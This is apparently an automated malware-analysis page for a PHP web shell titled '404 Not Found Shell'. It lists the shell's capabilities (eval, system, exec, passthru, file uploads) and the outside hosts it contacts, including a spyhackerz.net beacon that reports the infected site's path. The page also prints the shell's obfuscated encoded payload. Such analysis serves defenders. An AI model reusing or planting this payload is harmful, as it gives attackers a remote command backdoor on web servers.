PHP Malware Analysis
refo1.php, refo11.txt
md5: 9d33cbaa3b2aafa7a04991a20c8242f9
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
- base64_decode (Deobfuscated, HTML, Original, Traces)
- base64_encode (Deobfuscated, Traces)
Environment
- error_reporting (Deobfuscated, Traces)
- getcwd (Deobfuscated, Traces)
- php_uname (Deobfuscated, Traces)
- phpinfo (Deobfuscated, Traces)
- set_time_limit (Deobfuscated, Traces)
Execution
- eval (Deobfuscated, HTML, Original, Traces)
- exec (Deobfuscated, Traces)
- passthru (Deobfuscated, Traces)
- shell_exec (Deobfuscated, Traces)
- system (Deobfuscated, Traces)
Files
- copy (Deobfuscated, Traces)
- file_get_contents (Deobfuscated, Traces)
- file_put_contents (Deobfuscated, Traces)
- move_uploaded_file (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
Title
- - 404 Not Found Shell V. (Traces)
URLs
- http://inject0r.com/update.js (Deobfuscated, Traces)
- http://md5.rednoize.com/?q= (Deobfuscated, Traces)
- http://milw0rm.com/search.php?dong= (Deobfuscated, Traces)
- http://spyhackerz.net/app.js (Deobfuscated, Traces)
- http://www.google.com/search?q= (Deobfuscated, Traces)
- http://www.hashcrack.com/index.php (Deobfuscated, Traces)
- http://www.md5decrypter.com/ (Deobfuscated, Traces)
- http://www.milw0rm.com/cracker/search.php (Deobfuscated, Traces)
- https://hashcracking.info/index.php (Deobfuscated, Traces)
- https://inject0r.com/update.js (Deobfuscated, Traces)
- https://spyhackerz.net/app.js (Deobfuscated, Traces)
- https://spyhackerz.net/save.php?url= (Deobfuscated)
- https://spyhackerz.net/save.php?url=$site&id=7821718728974864923874 (Traces)
- https://spyhackerz.net/save.php?url=localhost/uploads/refo1.php&id=7821718728974864923874 (Traces)
Deobfuscated PHP code
<?php
$UeXploiT = "Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1KBrNK85PzcgqLU4mLqCCclFqeamcSnpCbnp6RqAO0sSi3TUHHMM8iLN64IyMnPDEkN0kQC1gA=";
$An0n_3xPloiTeR = "=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